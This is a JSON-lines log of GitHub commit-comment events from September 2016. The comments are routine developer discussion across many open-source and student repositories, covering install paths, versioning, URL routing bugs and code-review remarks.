{"id":"4514663222","type":"CommitCommentEvent","actor":{"login":"sergiobenrocha2"},"repo":{"name":"libretro/gambatte-libretro"},"payload":{"comment":{"id":18894712,"position":null,"line":null,"path":null,"commit_id":"24551644bee25534c12ccb6ddebd1e4266d727fe","created_at":"2016-09-05T00:44:31Z","updated_at":"2016-09-05T00:44:31Z","body":"It's installing the *.so in /lib by default, bad place ihmo... it should be at /usr/lib/ instead, or /usr/local/lib/"}},"created_at":"2016-09-05T00:44:31Z"}
{"id":"4514665061","type":"CommitCommentEvent","actor":{"login":"9Lukas5"},"repo":{"name":"Flyhalf205/android_frameworks_base"},"payload":{"comment":{"id":18894713,"position":null,"line":null,"path":null,"commit_id":"755613da248962a7c55a85e7ae85db5a0b8162c7","created_at":"2016-09-05T00:45:50Z","updated_at":"2016-09-05T00:45:50Z","body":"Hey, could have a look here, please?\r\nI pushed this commit to gerrit for review.\r\n\r\nhttps://review.cyanogenmod.org/#/c/160241/"}},"created_at":"2016-09-05T00:45:50Z"}
{"id":"4514667300","type":"CommitCommentEvent","actor":{"login":"bhollis"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":18894716,"position":null,"line":null,"path":null,"commit_id":"c36aac9eaa3455a9b842d0b55b56b3d2d90e2cd7","created_at":"2016-09-05T00:47:37Z","updated_at":"2016-09-05T00:47:37Z","body":"Makes sense!"}},"created_at":"2016-09-05T00:47:37Z"}
{"id":"4514668482","type":"CommitCommentEvent","actor":{"login":"SunburnedGoose"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":18894717,"position":null,"line":null,"path":null,"commit_id":"c36aac9eaa3455a9b842d0b55b56b3d2d90e2cd7","created_at":"2016-09-05T00:48:32Z","updated_at":"2016-09-05T00:48:32Z","body":"I had to scratch my head too on that one too.  "}},"created_at":"2016-09-05T00:48:32Z"}
{"id":"4514671683","type":"CommitCommentEvent","actor":{"login":"sergiobenrocha2"},"repo":{"name":"libretro/gambatte-libretro"},"payload":{"comment":{"id":18894721,"position":null,"line":null,"path":null,"commit_id":"24551644bee25534c12ccb6ddebd1e4266d727fe","created_at":"2016-09-05T00:50:51Z","updated_at":"2016-09-05T00:50:51Z","body":"Take a look at https://github.com/libretro/libretro-gme/commit/0cb66fcc8bb40a296156a49c27ea66c3ba167edc\r\n\r\nIf we are going to add make install support, there should be some consistency over all cores. GME is installing the .so at ~/.config/retroarch/cores/"}},"created_at":"2016-09-05T00:50:51Z"}
{"id":"4514672536","type":"CommitCommentEvent","actor":{"login":"malept"},"repo":{"name":"data-axle/superstore"},"payload":{"comment":{"id":18894723,"position":null,"line":null,"path":null,"commit_id":"81dbac521e3e79e47a3702fcdd6751cbaa32a955","created_at":"2016-09-05T00:51:31Z","updated_at":"2016-09-05T00:51:31Z","body":"Why are we worried about version bloat?"}},"created_at":"2016-09-05T00:51:31Z"}
{"id":"4514672654","type":"CommitCommentEvent","actor":{"login":"lyh1628"},"repo":{"name":"lyh1628/Dx"},"payload":{"comment":{"id":18894724,"position":5,"line":357,"path":"Player.cpp","commit_id":"62941e087674fb9b7b68028414acba0541467b74","created_at":"2016-09-05T00:51:37Z","updated_at":"2016-09-05T00:51:37Z","body":"이 부분에 주석을 처리하고, 했던 부분을 축가 해줌.\r\n![123](https://cloud.githubusercontent.com/assets/16483952/18234961/545f8e5a-734e-11e6-9f6e-ce18c5c86c0f.png)\r\n"}},"created_at":"2016-09-05T00:51:37Z"}
{"id":"4514675783","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18894728,"position":null,"line":null,"path":null,"commit_id":"d6b4dea7cb3cc15383ff02310ab166825ae69285","created_at":"2016-09-05T00:53:57Z","updated_at":"2016-09-05T00:53:57Z","body":"Not really, because I will do  this\r\ncomputed |= (DistanceRingBB[s][0] & ourPawns) | s;\r\n\r\nAlso, I will skip the isolated pawns.\r\nGive me 5 minutes, I will upload my working version.\r\nHere you go:\r\nhttps://github.com/Rocky640/Stockfish/commit/d26173cc8f5ed420323f9485ee8433ccddbfb7b0\r\n\r\nI made a speed test, but compiler probably flush away the unused code."}},"created_at":"2016-09-05T00:53:57Z"}
{"id":"4514677817","type":"CommitCommentEvent","actor":{"login":"Cruel"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18894729,"position":83,"line":217,"path":"res/romfs/lang/pt.lang","commit_id":"23964294ed3fbdb9336cd53c39157716c1e1ea1c","created_at":"2016-09-05T00:55:26Z","updated_at":"2016-09-05T00:55:26Z","body":"I looked at what git uses for \"commit\" and they translate it to \"consolidar\" and that seems more appropriate. Thanks."}},"created_at":"2016-09-05T00:55:26Z"}
{"id":"4514680182","type":"CommitCommentEvent","actor":{"login":"leann529"},"repo":{"name":"130641641/Sql-Server-batch"},"payload":{"comment":{"id":18894732,"position":null,"line":null,"path":null,"commit_id":"f1bafb2cce2b38b5a9e6f95bb4ada4f28c662bdc","created_at":"2016-09-05T00:57:07Z","updated_at":"2016-09-05T00:57:07Z","body":"わかなかったら、聞いてください。\r\n新しいのを更新すると、回答する。"}},"created_at":"2016-09-05T00:57:07Z"}
{"id":"4514689435","type":"CommitCommentEvent","actor":{"login":"SachaG"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":18894743,"position":null,"line":null,"path":null,"commit_id":"dd608bd7991a71d0a0fa882def2ffeae1dea5f33","created_at":"2016-09-05T01:03:19Z","updated_at":"2016-09-05T01:03:19Z","body":"@Slava small world!"}},"created_at":"2016-09-05T01:03:19Z"}
{"id":"4514695936","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18894759,"position":null,"line":null,"path":null,"commit_id":"ac47cbaff974a7ad51a9b93875e5c7a28c400556","created_at":"2016-09-05T01:07:36Z","updated_at":"2016-09-05T01:07:36Z","body":"Please add Xenial to both kernels for Pine64. For H3 boards it's somewhat complicated since dealing (patching) with this device tree stuff is really PITA. I scratch my head since weeks how to deal with all those H3 boards since upstream settings are not that thought-out (eg. DRAM clockspeed sometimes 624 and sometimes 672). Same with dvfs/cpufreq settings. For all H3 devices with the primitive voltage regulation this simply sucks.\r\n\r\nDidn't had time and nerves to get back to linux-sunxi ML with this. And am now off for vacation :)"}},"created_at":"2016-09-05T01:07:36Z"}
{"id":"4514700371","type":"CommitCommentEvent","actor":{"login":"matthuhiggins"},"repo":{"name":"data-axle/superstore"},"payload":{"comment":{"id":18894769,"position":null,"line":null,"path":null,"commit_id":"81dbac521e3e79e47a3702fcdd6751cbaa32a955","created_at":"2016-09-05T01:10:38Z","updated_at":"2016-09-05T01:10:38Z","body":"I am not with respect to superstore, because it has no audience. However, a successful public gem should be very worried about version bloat - it has qualitative meaning to the audience."}},"created_at":"2016-09-05T01:10:38Z"}
{"id":"4514701278","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":18894774,"position":null,"line":null,"path":null,"commit_id":"c86190f96bf659deb6c0de3bf52cdfdf3c8cf665","created_at":"2016-09-05T01:11:15Z","updated_at":"2016-09-05T01:11:15Z","body":"Does that still happen in latest master?"}},"created_at":"2016-09-05T01:11:15Z"}
{"id":"4514701571","type":"CommitCommentEvent","actor":{"login":"orta"},"repo":{"name":"danger/danger"},"payload":{"comment":{"id":18894775,"position":12,"line":131,"path":"lib/danger/danger_core/plugins/dangerfile_gitlab_plugin.rb","commit_id":"580ce6b91f05c1289648c597d5ab8e73eda62929","created_at":"2016-09-05T01:11:27Z","updated_at":"2016-09-05T01:11:27Z","body":"would probably be a one liner in the Dangerfile FWIW, not an unreasonable request IMO"}},"created_at":"2016-09-05T01:11:27Z"}
{"id":"4514702223","type":"CommitCommentEvent","actor":{"login":"orta"},"repo":{"name":"danger/danger"},"payload":{"comment":{"id":18894776,"position":12,"line":131,"path":"lib/danger/danger_core/plugins/dangerfile_gitlab_plugin.rb","commit_id":"580ce6b91f05c1289648c597d5ab8e73eda62929","created_at":"2016-09-05T01:11:52Z","updated_at":"2016-09-05T01:11:52Z","body":"I'd merge that"}},"created_at":"2016-09-05T01:11:52Z"}
{"id":"4514705235","type":"CommitCommentEvent","actor":{"login":"saraford"},"repo":{"name":"saraford/atom-hubot"},"payload":{"comment":{"id":18894781,"position":null,"line":null,"path":null,"commit_id":"95f937a7946614366b3b8303e0472a3ba3774f3d","created_at":"2016-09-05T01:13:51Z","updated_at":"2016-09-05T01:13:51Z","body":"Fixed #1 "}},"created_at":"2016-09-05T01:13:51Z"}
{"id":"4514705426","type":"CommitCommentEvent","actor":{"login":"Ryuzaki-MrL"},"repo":{"name":"joel16/3DSident"},"payload":{"comment":{"id":18894782,"position":14,"line":311,"path":"source/main.c","commit_id":"2dbdb1dbdbe0950c61c859d1bb724cc390aa931a","created_at":"2016-09-05T01:13:59Z","updated_at":"2016-09-05T01:13:59Z","body":"???"}},"created_at":"2016-09-05T01:13:59Z"}
{"id":"4514706963","type":"CommitCommentEvent","actor":{"login":"malept"},"repo":{"name":"data-axle/superstore"},"payload":{"comment":{"id":18894784,"position":null,"line":null,"path":null,"commit_id":"81dbac521e3e79e47a3702fcdd6751cbaa32a955","created_at":"2016-09-05T01:15:01Z","updated_at":"2016-09-05T01:15:01Z","body":"I think this version bump is reasonable, from a semantic versioning perspective. We added Rails 5 compatibility, which is essentially a new feature. We didn't remove Rails 4.2 compatibility, so this is a minor version bump.\r\n\r\nI'm interested in hearing how and why you think this should have been handled differently."}},"created_at":"2016-09-05T01:15:01Z"}
{"id":"4514706995","type":"CommitCommentEvent","actor":{"login":"mernst"},"repo":{"name":"google/google-java-format"},"payload":{"comment":{"id":18894785,"position":259,"line":259,"path":"core/src/main/java/com/google/googlejavaformat/java/javadoc/JavadocLexer.java","commit_id":"05a7ea5dba165177223f5a61c85fbe4cbecea9f0","created_at":"2016-09-05T01:15:02Z","updated_at":"2016-09-05T01:15:02Z","body":"I feel this would be undesirable.  People don't usually break words across lines, but they do write words that end with hyphens.  An example is:\r\n\r\n    /**\r\n     * Ensure that the pre-\r\n     * and post-conditions\r\n     * are satisfied.\r\n     */\r\n"}},"created_at":"2016-09-05T01:15:02Z"}
{"id":"4514707048","type":"CommitCommentEvent","actor":{"login":"masaru-b-cl"},"repo":{"name":"tanaka-takayoshi/dotnetcore_on_linux_handson"},"payload":{"comment":{"id":18894786,"position":34,"line":34,"path":"aspnetcore/Part3/README.md","commit_id":"ee1139eee36af64f0d70a2ea38f312c4e563f15a","created_at":"2016-09-05T01:15:04Z","updated_at":"2016-09-05T01:15:04Z","body":"`mkdir Views`の誤りではないでしょうか？"}},"created_at":"2016-09-05T01:15:04Z"}
{"id":"4514709327","type":"CommitCommentEvent","actor":{"login":"lyroge"},"repo":{"name":"lyroge/wechat_sdk"},"payload":{"comment":{"id":18894787,"position":39,"line":48,"path":"README.rst","commit_id":"b18974957be702302c564f9ddfff0cae4c78c710","created_at":"2016-09-05T01:16:33Z","updated_at":"2016-09-05T01:16:33Z","body":"感谢提醒"}},"created_at":"2016-09-05T01:16:33Z"}
{"id":"4514713102","type":"CommitCommentEvent","actor":{"login":"ckoshien"},"repo":{"name":"ckoshien/JCBLScore"},"payload":{"comment":{"id":18894790,"position":1,"line":41,"path":"JCBLScore/src/main/java/cx/myhome/ckoshien/action/PlanAction.java","commit_id":"5041fad9ece2ef5408b4358940fbfb3a6a0214ae","created_at":"2016-09-05T01:19:05Z","updated_at":"2016-09-05T01:19:05Z","body":"validator=trueにしないといけない"}},"created_at":"2016-09-05T01:19:05Z"}
{"id":"4514713828","type":"CommitCommentEvent","actor":{"login":"Chriswmillar"},"repo":{"name":"evangillespie/CodePad"},"payload":{"comment":{"id":18894791,"position":null,"line":null,"path":null,"commit_id":"150c0ee83e8ac35d1a6d11a4ed4c6700a87104d6","created_at":"2016-09-05T01:19:31Z","updated_at":"2016-09-05T01:19:31Z","body":"Corrected Nixie Offsets to 0, and 4"}},"created_at":"2016-09-05T01:19:31Z"}
{"id":"4514714621","type":"CommitCommentEvent","actor":{"login":"CyrusV5"},"repo":{"name":"bitcoin-core/bitcoincore.org"},"payload":{"comment":{"id":18894793,"position":55,"line":55,"path":"_posts/en/meetings/2016-08-25-meeting.md","commit_id":"96539901418e4ad6e033e3464330be702eeacfb0","created_at":"2016-09-05T01:20:01Z","updated_at":"2016-09-05T01:20:01Z","body":"> Gmaxwell likes see\r\n\"likes **to** see\"."}},"created_at":"2016-09-05T01:20:01Z"}
{"id":"4514714647","type":"CommitCommentEvent","actor":{"login":"maeda-naho"},"repo":{"name":"maeda-naho/ToDoList"},"payload":{"comment":{"id":18894794,"position":null,"line":null,"path":null,"commit_id":"852c9bfd876c58816147e4cccc49f42e0f59fd69","created_at":"2016-09-05T01:20:03Z","updated_at":"2016-09-05T01:20:03Z","body":"課題提出完了!\r\nhttps://enigmatic-eyrie-81518.herokuapp.com/tasks"}},"created_at":"2016-09-05T01:20:03Z"}
{"id":"4514714669","type":"CommitCommentEvent","actor":{"login":"Yoshida-Akiho"},"repo":{"name":"Yoshida-Akiho/ToDoList"},"payload":{"comment":{"id":18894795,"position":null,"line":null,"path":null,"commit_id":"f085a383c59f651f59941197aac23c3b7676ae65","created_at":"2016-09-05T01:20:03Z","updated_at":"2016-09-05T01:20:03Z","body":"課題提出完了！！！！\r\nhttps://obscure-shelf-36944.herokuapp.com/tasks"}},"created_at":"2016-09-05T01:20:03Z"}
{"id":"4514715173","type":"CommitCommentEvent","actor":{"login":"snare"},"repo":{"name":"snare/voltron"},"payload":{"comment":{"id":18894796,"position":6,"line":28,"path":"voltron/plugins/view/memory.py","commit_id":"4d0498c6887c241ab629afda78aeb41c27f6afbf","created_at":"2016-09-05T01:20:20Z","updated_at":"2016-09-05T01:20:20Z","body":"Yup well spotted"}},"created_at":"2016-09-05T01:20:20Z"}
{"id":"4514716180","type":"CommitCommentEvent","actor":{"login":"Alissonfgp"},"repo":{"name":"Alissonfgp/forgottenserver"},"payload":{"comment":{"id":18894798,"position":1,"line":891,"path":"src/player.cpp","commit_id":"40f8154f1095246411f30ddc0f10064b62f982c3","created_at":"2016-09-05T01:20:56Z","updated_at":"2016-09-05T01:20:56Z","body":"Yes, here have some bugs like when open 2 pages and you \"move up\" in RL open first page, here show others depots, I need to fix some details now...\r\nIn your system or my system? have crashs like this that you tell me?\r\nI don't understand very much, but soon I will open a test server and you show me, is better for me understand it."}},"created_at":"2016-09-05T01:20:56Z"}
{"id":"4514716231","type":"CommitCommentEvent","actor":{"login":"Grazfather"},"repo":{"name":"snare/voltron"},"payload":{"comment":{"id":18894799,"position":43,"line":172,"path":"voltron/plugins/view/memory.py","commit_id":"4d0498c6887c241ab629afda78aeb41c27f6afbf","created_at":"2016-09-05T01:20:58Z","updated_at":"2016-09-05T01:20:58Z","body":"here as well"}},"created_at":"2016-09-05T01:20:58Z"}
{"id":"4514716632","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":18894802,"position":null,"line":null,"path":null,"commit_id":"c86190f96bf659deb6c0de3bf52cdfdf3c8cf665","created_at":"2016-09-05T01:21:15Z","updated_at":"2016-09-05T01:21:15Z","body":"Also whar is your Python version? "}},"created_at":"2016-09-05T01:21:15Z"}
{"id":"4514720878","type":"CommitCommentEvent","actor":{"login":"rozzzly"},"repo":{"name":"rozzzly/vscode-jump"},"payload":{"comment":{"id":18894806,"position":17,"line":17,"path":"src/commands/JumpToRelated.ts","commit_id":"fda82853188b72fb2f0918e3713f9cee19fa7fd2","created_at":"2016-09-05T01:23:54Z","updated_at":"2016-09-05T01:23:54Z","body":"Should be `lazyInject( ... )`. Just `inject( ... )` will instantiate a new instance, not binding the singleton instance we expect it to."}},"created_at":"2016-09-05T01:23:54Z"}
{"id":"4514720971","type":"CommitCommentEvent","actor":{"login":"Rainrider"},"repo":{"name":"RealUI/RealUI"},"payload":{"comment":{"id":18894807,"position":null,"line":null,"path":null,"commit_id":"97ad2b908d96b2bb0bd04c43c732a8ab92238f13","created_at":"2016-09-05T01:23:57Z","updated_at":"2016-09-05T01:23:57Z","body":"I already added your changes to LAD, I hope you don't mind."}},"created_at":"2016-09-05T01:23:57Z"}
{"id":"4514725478","type":"CommitCommentEvent","actor":{"login":"MA985587"},"repo":{"name":"MA985587/AbdulRabbueHO"},"payload":{"comment":{"id":18894813,"position":null,"line":null,"path":null,"commit_id":"bfc53c56e3c168b99fad1d9e715216529d3fe74d","created_at":"2016-09-05T01:26:47Z","updated_at":"2016-09-05T01:26:47Z","body":"Hello world class homework"}},"created_at":"2016-09-05T01:26:47Z"}
{"id":"4514728316","type":"CommitCommentEvent","actor":{"login":"fauxparse"},"repo":{"name":"fauxparse/nzif"},"payload":{"comment":{"id":18894816,"position":null,"line":null,"path":null,"commit_id":"25217437ff7b38cc8588c31b134f61b02171848a","created_at":"2016-09-05T01:28:32Z","updated_at":"2016-09-05T01:28:32Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;dXecfmIk&#x2F;43-activity-names-are-not-unique-across-activity-types\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Activity names are not unique across activity types</a>"}},"created_at":"2016-09-05T01:28:32Z"}
{"id":"4514728408","type":"CommitCommentEvent","actor":{"login":"getogrand"},"repo":{"name":"triplepy/sh8email-django"},"payload":{"comment":{"id":18894817,"position":7,"line":7,"path":"rest/urls.py","commit_id":"f0259029f095d86ccaa5875a2316f14c93f2575a","created_at":"2016-09-05T01:28:36Z","updated_at":"2016-09-05T01:28:36Z","body":"@kyunooh There is a misconnection on url and view. `r'^(?P<pk>[0-9]+)/$'` should be linked on `views.MailDetail.as_view()` not `views.MailList.as_view()`."}},"created_at":"2016-09-05T01:28:36Z"}
{"id":"4514730530","type":"CommitCommentEvent","actor":{"login":"AdamWill"},"repo":{"name":"os-autoinst/os-autoinst"},"payload":{"comment":{"id":18894820,"position":null,"line":null,"path":null,"commit_id":"41ebf9fb4198d021f3710be7e58aea3df448c0a2","created_at":"2016-09-05T01:29:54Z","updated_at":"2016-09-05T01:29:54Z","body":"there's a ton of `odd number of elements in anonymous hash` warnings in autoinst logs after this commit, too."}},"created_at":"2016-09-05T01:29:54Z"}
{"id":"4514735408","type":"CommitCommentEvent","actor":{"login":"yoshikawa-mikako"},"repo":{"name":"yoshikawa-mikako/ToDoList"},"payload":{"comment":{"id":18894826,"position":null,"line":null,"path":null,"commit_id":"d69e93d749e005cfc0e95a432603ad04f02669e1","created_at":"2016-09-05T01:32:54Z","updated_at":"2016-09-05T01:32:54Z","body":"課題提出完了\r\nhttps://fierce-eyrie-84987.herokuapp.com/tasks"}},"created_at":"2016-09-05T01:32:54Z"}
{"id":"4514736131","type":"CommitCommentEvent","actor":{"login":"XFuryMCPE"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":18894827,"position":null,"line":null,"path":null,"commit_id":"d274062addf3beeec541c6259ecdafbda286e4bd","created_at":"2016-09-05T01:33:21Z","updated_at":"2016-09-05T01:33:21Z","body":"@boybook "}},"created_at":"2016-09-05T01:33:21Z"}
{"id":"4514737310","type":"CommitCommentEvent","actor":{"login":"matthuhiggins"},"repo":{"name":"data-axle/superstore"},"payload":{"comment":{"id":18894830,"position":null,"line":null,"path":null,"commit_id":"81dbac521e3e79e47a3702fcdd6751cbaa32a955","created_at":"2016-09-05T01:34:07Z","updated_at":"2016-09-05T01:34:07Z","body":"> I'm interested in hearing how and why you think this should have been handled differently.\r\n\r\n> We added Rails 5 compatibility, which is essentially a new feature.\r\n\r\nThe following two extreme choices are both available with semantic versioning:\r\n* Release a new minor version every time a new feature is added to the gem.\r\n* Release a new minor version every six months, with 150 new features. (ala Rails)\r\n\r\nWe are having this discussion because both of these choices exist within semantic versioning. Things to discuss, which are all qualitative, are:\r\n* How much eagerness to take with releasing a version immediately after the new feature is available, versus exercising the new feature within an app for some duration. (I am overly eager to a fault.)\r\n* Using the version as a marketable \"milestone\" for a new body of work. (For example, \"Rails 5.1\" will mean more than just a version bump - the customers of Rails think of it as a whole new set of features.\r\n\r\nNothing I am saying really matters for this gem, superstore. I am speaking on generalities about gems where version upgrades have larger impact."}},"created_at":"2016-09-05T01:34:07Z"}
{"id":"4514737326","type":"CommitCommentEvent","actor":{"login":"whoburg"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18894831,"position":null,"line":null,"path":null,"commit_id":"46037dfb2cec4aa920fd9a4d33e0c4dbc5f1d7ea","created_at":"2016-09-05T01:34:08Z","updated_at":"2016-09-05T01:34:08Z","body":"@mopg or @bqpd, quick review of this commit"}},"created_at":"2016-09-05T01:34:08Z"}
{"id":"4514738081","type":"CommitCommentEvent","actor":{"login":"whoburg"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18894833,"position":null,"line":null,"path":null,"commit_id":"c4dfe0b7950fff1f84600de9b17de00ffe72fd13","created_at":"2016-09-05T01:34:39Z","updated_at":"2016-09-05T01:34:39Z","body":"good point, implemented in 46037dfb2cec4aa920fd9a4d33e0c4dbc5f1d7ea"}},"created_at":"2016-09-05T01:34:39Z"}
{"id":"4514738493","type":"CommitCommentEvent","actor":{"login":"SeokRae"},"repo":{"name":"Farmer-Huan/Huan-Project"},"payload":{"comment":{"id":18894834,"position":null,"line":null,"path":null,"commit_id":"f4b9a3cb10b7aaa703001b4530aa3cfaebf9040a","created_at":"2016-09-05T01:34:53Z","updated_at":"2016-09-05T01:34:53Z","body":"[AppMa] \"이거 안쓰고 board 폴더사용하자 옴겨 놓음\""}},"created_at":"2016-09-05T01:34:53Z"}
{"id":"4514745588","type":"CommitCommentEvent","actor":{"login":"getogrand"},"repo":{"name":"triplepy/sh8email-django"},"payload":{"comment":{"id":18894844,"position":6,"line":6,"path":"rest/urls.py","commit_id":"f0259029f095d86ccaa5875a2316f14c93f2575a","created_at":"2016-09-05T01:39:11Z","updated_at":"2016-09-05T01:39:11Z","body":"@kyunooh We should to discuss about designing REST url. I think that urls have to be changed to more RESTy.\r\nHere is a my url suggestion below.\r\n```\r\n- View the list of emails: /rest/mail/\r\n- View/edit an email: /rest/mail/{mail_pk}/\r\n```"}},"created_at":"2016-09-05T01:39:11Z"}
{"id":"4514748172","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"ossrs/srs"},"payload":{"comment":{"id":18894847,"position":null,"line":null,"path":null,"commit_id":"6ec60b0a21e7e55d3cce7dd6da5931fdd318844d","created_at":"2016-09-05T01:40:44Z","updated_at":"2016-09-05T01:40:44Z","body":"https://github.com/ossrs/state-threads/issues/2"}},"created_at":"2016-09-05T01:40:44Z"}
{"id":"4514748207","type":"CommitCommentEvent","actor":{"login":"barrierwings-jay"},"repo":{"name":"barrierwings-jay/django_practice"},"payload":{"comment":{"id":18894848,"position":null,"line":null,"path":null,"commit_id":"5bef3ab5b56306cdf066f8ff7e74550f43d29779","created_at":"2016-09-05T01:40:46Z","updated_at":"2016-09-05T01:40:46Z","body":"This example doesn't work with ko-kr language setting."}},"created_at":"2016-09-05T01:40:46Z"}
{"id":"4514748755","type":"CommitCommentEvent","actor":{"login":"ishitatsuyuki"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18894849,"position":null,"line":null,"path":null,"commit_id":"93656f5564b67296b7887a77a24e0504a47cfafe","created_at":"2016-09-05T01:41:06Z","updated_at":"2016-09-05T01:41:06Z","body":"We're not AGPL, but pure GPL."}},"created_at":"2016-09-05T01:41:06Z"}
{"id":"4514752194","type":"CommitCommentEvent","actor":{"login":"OXINARF"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":18894853,"position":null,"line":null,"path":null,"commit_id":"4c22c599333b93a2613af3eb18c96e4c16d88b56","created_at":"2016-09-05T01:43:12Z","updated_at":"2016-09-05T01:43:12Z","body":"Is this enough? In CI we run make clean and make px4-cleandep between each PX4 build, not sure if it is needed or not."}},"created_at":"2016-09-05T01:43:12Z"}
{"id":"4514752667","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":18894854,"position":null,"line":null,"path":null,"commit_id":"1675945175b57392d5a08c30794d9351093cff0b","created_at":"2016-09-05T01:43:29Z","updated_at":"2016-09-05T01:43:29Z","body":"This starts the work for issue #28"}},"created_at":"2016-09-05T01:43:29Z"}
{"id":"4514755950","type":"CommitCommentEvent","actor":{"login":"AlexCSilva"},"repo":{"name":"Zyk6870/OpenJK"},"payload":{"comment":{"id":18894856,"position":null,"line":null,"path":null,"commit_id":"c5556184f5f4687f58a3856082af003f029fc6c4","created_at":"2016-09-05T01:45:21Z","updated_at":"2016-09-05T01:45:21Z","body":"nice"}},"created_at":"2016-09-05T01:45:21Z"}
{"id":"4514755955","type":"CommitCommentEvent","actor":{"login":"VCDS"},"repo":{"name":"VCDS/test"},"payload":{"comment":{"id":18894857,"position":1,"line":1,"path":"README.md","commit_id":"d1e2c78d93fdb40e1340846f7ffaf5b2f0f0bc91","created_at":"2016-09-05T01:45:21Z","updated_at":"2016-09-05T01:45:21Z","body":"asasas"}},"created_at":"2016-09-05T01:45:21Z"}
{"id":"4514763510","type":"CommitCommentEvent","actor":{"login":"Ismael-VC"},"repo":{"name":"KristofferC/PimpMyREPL.jl"},"payload":{"comment":{"id":18894864,"position":null,"line":null,"path":null,"commit_id":"3c3b2b2970c830ce015ec6f76dc82ea509bc1e57","created_at":"2016-09-05T01:49:45Z","updated_at":"2016-09-05T01:49:45Z","body":"Ah, I was also wondering about this line, I ended up doing:\r\n\r\n```julia\r\nmacro suppress_err(block)\r\n    quote\r\n        if ccall(:jl_generating_output, Cint, ()) == 0\r\n            ORIGINAL_STDERR = STDERR\r\n            err_rd, err_wr = redirect_stderr()\r\n            err_reader = @async readstring(err_rd)\r\n\r\n            value = $(esc(block))\r\n\r\n            @async wait(err_reader)\r\n            REDIRECTED_STDERR = STDERR\r\n            err_stream = redirect_stderr(ORIGINAL_STDERR)\r\n\r\n            return value\r\n        end\r\n    end\r\nend\r\n```\r\n\r\nNote the line:\r\n\r\n* `@async wait(err_reader)`"}},"created_at":"2016-09-05T01:49:45Z"}
{"id":"4514766119","type":"CommitCommentEvent","actor":{"login":"mkschreder"},"repo":{"name":"mkschreder/orangerpcd"},"payload":{"comment":{"id":18894866,"position":null,"line":null,"path":null,"commit_id":"ea57d5be8d2d14f792f80c67cd531340986bac18","created_at":"2016-09-05T01:51:17Z","updated_at":"2016-09-05T01:51:17Z","body":"Still segfaults even with yesterdays additions? Now it passes a whole set\nof valgrind tests (apart from false positives on sgcheck) and also coverage\nis up to 86%. Stability should be a lot better.\n\nOn 1 Sep 2016 15:30, \"Fabian Müller-Knapp\" <notifications@github.com> wrote:\n\n> Thanks for the heads up, that could in fact fix the issue. I tried 2.16.08\n> yesterday which also segfaults with out the patch. Nevertheless it would be\n> interesting to know what causes the instability on uClibc, as\n> pthread_attr_setstacksize just sets *the minimum size* for new threads.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mkschreder/orangerpcd/commit/ea57d5be8d2d14f792f80c67cd531340986bac18#commitcomment-18863776>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AERqiZthAnWFta_hNctLGIQMq25guwHpks5qltN9gaJpZM4Jp8Rw>\n> .\n>\n"}},"created_at":"2016-09-05T01:51:17Z"}
{"id":"4514771227","type":"CommitCommentEvent","actor":{"login":"TKgoes"},"repo":{"name":"zlmwork/aimila"},"payload":{"comment":{"id":18894874,"position":1,"line":1,"path":"README.md","commit_id":"d3903bc3da616b0cdfc52f14630d198b47a9d4cb","created_at":"2016-09-05T01:54:18Z","updated_at":"2016-09-05T01:54:18Z","body":"老赵， 我follow了一下， 目前没有进展，想知道具体的展开计划和时间节点，\r\n有时间讨论吗？ "}},"created_at":"2016-09-05T01:54:18Z"}
{"id":"4514773151","type":"CommitCommentEvent","actor":{"login":"Hammman"},"repo":{"name":"binary-koan/StoryMapJS"},"payload":{"comment":{"id":18894878,"position":null,"line":null,"path":null,"commit_id":"ba8032b41e33b96054cddfcb1fa0bc5f0a7b2bd1","created_at":"2016-09-05T01:55:27Z","updated_at":"2016-09-05T01:55:27Z","body":"Also changed the way that we delete storymap keys."}},"created_at":"2016-09-05T01:55:27Z"}
{"id":"4514775288","type":"CommitCommentEvent","actor":{"login":"liangqianshun"},"repo":{"name":"liangqianshun/Lucifer"},"payload":{"comment":{"id":18894882,"position":null,"line":null,"path":null,"commit_id":"fd5bf748141e575a279e33bc5861a7bfbddaf8a4","created_at":"2016-09-05T01:56:36Z","updated_at":"2016-09-05T01:56:36Z","body":"传奇世界"}},"created_at":"2016-09-05T01:56:36Z"}
{"id":"4514775727","type":"CommitCommentEvent","actor":{"login":"Zahzi"},"repo":{"name":"Zahzi/SinusBot-Stream"},"payload":{"comment":{"id":18894884,"position":null,"line":null,"path":null,"commit_id":"c833c8bfebca9472737a4c4c46a2f4588fadceab","created_at":"2016-09-05T01:56:51Z","updated_at":"2016-09-05T01:56:51Z","body":"Moved file to /SinusBot-Stream"}},"created_at":"2016-09-05T01:56:51Z"}
